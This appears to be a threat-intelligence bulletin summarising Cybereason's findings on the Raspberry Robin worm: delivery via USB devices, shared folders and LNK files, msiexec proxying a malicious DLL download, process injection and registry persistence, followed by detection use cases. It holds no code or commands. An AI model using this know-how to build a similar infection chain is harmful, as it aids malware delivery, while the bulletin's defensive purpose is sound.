2022-07-13

Researchers Found Infection Chain in USB Devices and Shared Folders

Level: 
Tactical
  |  Source: 
Cybereason
Share:
Researchers Found Infection Chain in USB Devices and Shared Folders
Industry: N/A | Level: Tactical | Source: Cybereason

Cybereason shared an infection chain involving Raspberry Robin, a malware worm that is often distributed through infected USB devices or shared folders. Although, the method is commonly observed to infect victims through Microsoft shortcut/LNK files, the delivery method has varied "through file archives, removable devices (USB) or ISO files." The LNK file calls on the Windows command shell to spawn msiexec.exe to proxy a download of a malicious DLL file. To maintain stealth the malware will inject itself into three processes often rundll32.exe, regsvr32.exe, and dllhost.exe. Persistence is established through the registry run key.

Anvilogic Scenario:

  • Raspberry Robin Abuses MsiExec

Anvilogic Use Cases:

  • Compressed File Execution
  • Symbolic OR Hard File Link Created
  • Msiexec Abuse
  • Rare Remote Thread

Get trending threats published weekly by the Anvilogic team.

Sign Up Now